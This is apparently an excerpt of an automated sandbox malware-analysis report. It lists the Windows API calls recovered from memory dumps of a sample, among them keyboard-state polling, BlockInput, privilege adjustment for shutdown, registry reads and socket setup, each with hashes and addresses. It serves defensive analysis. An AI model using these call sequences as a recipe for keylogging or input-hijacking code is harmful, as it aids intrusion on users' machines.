                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharLowerBuffW.USER32(?,?), ref: 00C0FBE3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: BuffCharLower
                • String ID:
                • API String ID: 2358735015-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                • GetPrivateProfileStringW.KERNEL32 ref: 00C18EBE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: FullNamePathPrivateProfileString
                • String ID:
                • API String ID: 1991638491-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BA6332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA633E
                  • Part of subcall function 00BA6332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA6350
                  • Part of subcall function 00BA6332: FreeLibrary.KERNEL32(00000000,?,?,00BA637F,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6362
                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA639F
                  • Part of subcall function 00BA62FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6304
                  • Part of subcall function 00BA62FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA6316
                  • Part of subcall function 00BA62FB: FreeLibrary.KERNEL32(00000000,?,?,00BE54C3,?,?,00BA60AA,?,00000001,?,?,00000000), ref: 00BA6329
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: Library$Load$AddressFreeProc
                • String ID:
                • API String ID: 2632591731-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: __wsopen_s
                • String ID:
                • API String ID: 3347428461-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00BA6B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00BAB0AC
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BA33E9,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA4227
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: FullNamePath_wcslen
                • String ID:
                • API String ID: 4019309064-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC6A99,?,0000015D,?,?,?,?,00BC85D0,000000FF,00000000,?,?), ref: 00BD3BE2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00BE41AF,00C64600,00000002), ref: 00C0D4E6
                  • Part of subcall function 00C0D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00C0D4D9,?,?,?), ref: 00C0D419
                  • Part of subcall function 00C0D3F7: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00C0D4D9,?,?,?,?,00BE41AF,00C64600,00000002), ref: 00C0D42E
                  • Part of subcall function 00C0D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00C0D4D9,?,?,?,?,00BE41AF,00C64600,00000002), ref: 00C0D43A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: File$Pointer$Write
                • String ID:
                • API String ID: 3847668363-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: __fread_nolock
                • String ID:
                • API String ID: 2638373210-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _wcslen
                • String ID:
                • API String ID: 176396367-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetShortPathNameW.KERNELBASE ref: 00C0E7A2
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: NamePathShort_wcslen
                • String ID:
                • API String ID: 2021730007-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA39FD
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: LongNamePath_wcslen
                • String ID:
                • API String ID: 541455249-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C0E76C
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FolderPath_wcslen
                • String ID:
                • API String ID: 2987691875-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00BE3A1C), ref: 00BA7973
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00C0D9DC,?,?), ref: 00C0DA72
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CopyFile
                • String ID:
                • API String ID: 1304948518-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(00000000,00000000,?,00BE0AA4,?,?,00000000,?,00BE0AA4,00000000,0000000C), ref: 00BE0757
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNELBASE(?,00C0D755), ref: 00C0E9C6
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00C01989: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C019A4
                  • Part of subcall function 00C01989: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C0142B,?,?,?), ref: 00C019B0
                  • Part of subcall function 00C01989: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C0142B,?,?,?), ref: 00C019BF
                  • Part of subcall function 00C01989: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C0142B,?,?,?), ref: 00C019C6
                  • Part of subcall function 00C01989: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C019DD
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C0145C
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C01490
                • GetLengthSid.ADVAPI32(?), ref: 00C014A7
                • GetAce.ADVAPI32(?,00000000,?), ref: 00C014E1
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C014FD
                • GetLengthSid.ADVAPI32(?), ref: 00C01514
                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C0151C
                • HeapAlloc.KERNEL32(00000000), ref: 00C01523
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C01544
                • CopySid.ADVAPI32(00000000), ref: 00C0154B
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C0157A
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C0159C
                • SetUserObjectSecurity.USER32 ref: 00C015AE
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C015D5
                • HeapFree.KERNEL32(00000000), ref: 00C015DC
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C015E5
                • HeapFree.KERNEL32(00000000), ref: 00C015EC
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C015F5
                • HeapFree.KERNEL32(00000000), ref: 00C015FC
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C01608
                • HeapFree.KERNEL32(00000000), ref: 00C0160F
                  • Part of subcall function 00C01A23: GetProcessHeap.KERNEL32(00000008,00C01441,?,00000000,?,00C01441,?), ref: 00C01A31
                  • Part of subcall function 00C01A23: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C01441,?), ref: 00C01A38
                  • Part of subcall function 00C01A23: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C01441,?), ref: 00C01A47
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 4175595110-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00C17318
                • FindClose.KERNEL32(00000000), ref: 00C1736C
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C173A8
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C173CF
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C1740C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C17439
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                • API String ID: 3830820486-3289030164
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?,772961D0,?,00000000), ref: 00C1A11B
                • FindNextFileW.KERNEL32(00000000,?), ref: 00C1A176
                • FindClose.KERNEL32(00000000), ref: 00C1A181
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00C1A19D
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C1A1ED
                • SetCurrentDirectoryW.KERNEL32(00C67B94), ref: 00C1A20B
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1A215
                • FindClose.KERNEL32(00000000), ref: 00C1A222
                • FindClose.KERNEL32(00000000), ref: 00C1A232
                  • Part of subcall function 00C0E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C0E2C9
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00C2D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2C00D,?,?), ref: 00C2D314
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D350
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3C7
                  • Part of subcall function 00C2D2F7: _wcslen.LIBCMT ref: 00C2D3FD
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C89D
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C2C908
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2C92C
                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C2C98B
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C2CA46
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C2CAB3
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C2CB48
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C2CB99
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C2CC42
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C2CCE1
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2CCEE
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                • String ID:
                • API String ID: 3102970594-0
                • Opcode ID: 7f424afa4a000a80e01a299ce28bf78c1b3e9c5db6305ea8a95559ce6f1bdbbe
                • Instruction ID: fef9d80f18e1d33318641aba1e784b1a078177aeea495aea6d831bbffde1a8cb
                • Opcode Fuzzy Hash: 7f424afa4a000a80e01a299ce28bf78c1b3e9c5db6305ea8a95559ce6f1bdbbe
                • Instruction Fuzzy Hash: 12026F71604210AFC714DF28D8D5E2ABBE5EF89314F18849DF85ACB6A2DB31ED41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 00C0A572
                • GetAsyncKeyState.USER32(000000A0), ref: 00C0A5F3
                • GetKeyState.USER32(000000A0), ref: 00C0A60E
                • GetAsyncKeyState.USER32(000000A1), ref: 00C0A628
                • GetKeyState.USER32(000000A1), ref: 00C0A63D
                • GetAsyncKeyState.USER32(00000011), ref: 00C0A655
                • GetKeyState.USER32(00000011), ref: 00C0A667
                • GetAsyncKeyState.USER32(00000012), ref: 00C0A67F
                • GetKeyState.USER32(00000012), ref: 00C0A691
                • GetAsyncKeyState.USER32(0000005B), ref: 00C0A6A9
                • GetKeyState.USER32(0000005B), ref: 00C0A6BB
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 310b3e678ff2d284206b0c0b88bbe0545b4834e91f786744f0df43a584437157
                • Instruction ID: 0c6038d6759a1dd9822e3b5cb6f7a254d999de0480644f4eed30a092cd125c01
                • Opcode Fuzzy Hash: 310b3e678ff2d284206b0c0b88bbe0545b4834e91f786744f0df43a584437157
                • Instruction Fuzzy Hash: 0341B774908BC96EFF31876098153E9BEB06F11344F0C8059E5E64A2C2DB959FD4CB67
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitialize.OLE32 ref: 00C240D1
                • CoUninitialize.OLE32 ref: 00C240DC
                • CoCreateInstance.OLE32(?,00000000,00000017,00C40B44,?), ref: 00C24136
                • IIDFromString.OLE32(?,?), ref: 00C241A9
                • VariantInit.OLEAUT32(?), ref: 00C24241
                • VariantClear.OLEAUT32(?), ref: 00C24293
                Strings
                Similarity
                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 636576611-1287834457
                • Opcode ID: 19fa784691aeb306d3fdeeb4a6e7494a8fbf9f2e10cf7669b3c3af36ac440d79
                • Instruction ID: 7c483ab3ad989e810f2768b53f4fe229940ae2bbbdd97a5a2aff44583534eea6
                • Opcode Fuzzy Hash: 19fa784691aeb306d3fdeeb4a6e7494a8fbf9f2e10cf7669b3c3af36ac440d79
                • Instruction Fuzzy Hash: 7D61BF71208311DFC314DF65E888F6EBBE4AF49714F100959F9919B691CB70ED88CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00C01F53: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C01F9D
                  • Part of subcall function 00C01F53: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C01FCA
                  • Part of subcall function 00C01F53: GetLastError.KERNEL32 ref: 00C01FDA
                • ExitWindowsEx.USER32(?,00000000), ref: 00C0F15E
                Strings
                Similarity
                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                • String ID: $ $@$SeShutdownPrivilege
                • API String ID: 2234035333-3163812486
                • Opcode ID: 4bf3ef979dd50964f0572cc8a005fb955089e5e4779dc73abdefb30587998589
                • Instruction ID: cc62e1648bc77d3f477770eccc37fc7e9b85162be45b62ad93767c1b2e10b4ba
                • Opcode Fuzzy Hash: 4bf3ef979dd50964f0572cc8a005fb955089e5e4779dc73abdefb30587998589
                • Instruction Fuzzy Hash: 8401F972624314ABE73466B8EC85FFF726CAB08390F150839FD13E20D1DA615D82D190
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C1A4D5
                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C1A5E8
                  • Part of subcall function 00C141CE: GetInputState.USER32 ref: 00C14225
                  • Part of subcall function 00C141CE: PeekMessageW.USER32 ref: 00C142C0
                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C1A505
                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C1A5D2
                Strings
                Similarity
                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                • String ID: *.*
                • API String ID: 1972594611-438819550
                • Opcode ID: 66cde5928ac523724e8c9158fef34c2f045e59a9019988fee8ad7d0c1f3dfbf4
                • Instruction ID: 8e984498a4d94d1439f38c837acdc184428a26bc9366321a3fec6a83c39fd321
                • Opcode Fuzzy Hash: 66cde5928ac523724e8c9158fef34c2f045e59a9019988fee8ad7d0c1f3dfbf4
                • Instruction Fuzzy Hash: 2D419F7190920AAFCF15DFA4D849BEEBBB9FF16310F244096E815A21A1D7309F84DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DefDlgProcW.USER32(?,?), ref: 00BA22EE
                • GetSysColor.USER32(0000000F), ref: 00BA23C3
                • SetBkColor.GDI32(?,00000000), ref: 00BA23D6
                Similarity
                • API ID: Color$Proc
                • String ID:
                • API String ID: 929743424-0
                • Opcode ID: 891690f30ff820cbbf24e1f5233ec1c5b97c92e28b931dfeda4f7d6bee77ca00
                • Instruction ID: ee9ed17bb5e1b9c607c6ae23ab93d618a166e17b2dbce9b3ef1845e4862da269
                • Opcode Fuzzy Hash: 891690f30ff820cbbf24e1f5233ec1c5b97c92e28b931dfeda4f7d6bee77ca00
                • Instruction Fuzzy Hash: 3081F4F061C194BEEA28AB3E8C9DF7F29DDDB43700F150189F142C6691CB69CE01E226
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00C239AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C239D7
                  • Part of subcall function 00C239AB: _wcslen.LIBCMT ref: 00C239F8
                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C221BA
                • WSAGetLastError.WSOCK32 ref: 00C221E1
                • bind.WSOCK32(00000000,?,00000010), ref: 00C22238
                • WSAGetLastError.WSOCK32 ref: 00C22243
                • closesocket.WSOCK32(00000000), ref: 00C22272
                Similarity
                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                • String ID:
                • API String ID: 1601658205-0
                • Opcode ID: 589257f9a7d802a7188a1d074700cd9c3bb8665bb56df00881887685c79fbf89
                • Instruction ID: b2ec0594e1e173549c3db5a5b20001b5efbfa7d66ff2a131c69ec86733d6f523
                • Opcode Fuzzy Hash: 589257f9a7d802a7188a1d074700cd9c3bb8665bb56df00881887685c79fbf89
                • Instruction Fuzzy Hash: 3A51C071A00210AFD710AF28D896F6A77E5AB05714F048498F91A9F3D3CB71ED418BE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                • Opcode ID: 6e083eda2c3c760723794b05e38d1b7b265271da38c5eca5c6dad23873eaf509
                • Instruction ID: a92deb0f951bca93a2941e8d2b71c4d5766e9d224ce6d4da4103557f8f337ea5
                • Opcode Fuzzy Hash: 6e083eda2c3c760723794b05e38d1b7b265271da38c5eca5c6dad23873eaf509
                • Instruction Fuzzy Hash: E22106313102409FDB208F2AD855B5B7BE5EF95324F18846CF89ACB251DB31EE42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 00BFE60A
                Strings
                Similarity
                • API ID: NameUser
                • String ID: X64
                • API String ID: 2645101109-893830106
                • Opcode ID: ca175a5ccb5274da0312064df930b24387601f6fcf41d9fb892de7a9e4477fc7
                • Instruction ID: 776c30489f92f80af01475c1152b21b898e00742aa2bb0538ae5c1033ffdabc2
                • Opcode Fuzzy Hash: ca175a5ccb5274da0312064df930b24387601f6fcf41d9fb892de7a9e4477fc7
                • Instruction Fuzzy Hash: BDD0C9B481111DEBCF90CBA0ECC8EED77BCBB04304F100191F106E2110D77095488B10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • BlockInput.USER32(00000001), ref: 00C1F41A
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: 643fac34c053e56504633e4d5ce890c137423f441c31738fc3e5eab0034612a0
                • Instruction ID: 453898d0ee9dd3976362ce4097f642c905ccf3518643eecfae33de50bf35303f
                • Opcode Fuzzy Hash: 643fac34c053e56504633e4d5ce890c137423f441c31738fc3e5eab0034612a0
                • Instruction Fuzzy Hash: 98E048312042055FD710EF69D405A9BB7E8AF66760F00846AF95AC7351D670F841DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DestroyWindow.USER32(00000000), ref: 00C2309B
                • SystemParametersInfoW.USER32 ref: 00C231C7
                • SetRect.USER32 ref: 00C23206
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C23216
                • CreateWindowExW.USER32 ref: 00C2325D
                • GetClientRect.USER32 ref: 00C23269
                • CreateWindowExW.USER32 ref: 00C232B2
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C232C1
                • GetStockObject.GDI32(00000011), ref: 00C232D1
                • SelectObject.GDI32(00000000,00000000), ref: 00C232D5
                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C232E5
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C232EE
                • DeleteDC.GDI32(00000000), ref: 00C232F7
                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00C23323
                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C2333A
                • CreateWindowExW.USER32 ref: 00C2337A
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C2338E
                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C2339F
                • CreateWindowExW.USER32 ref: 00C233D4
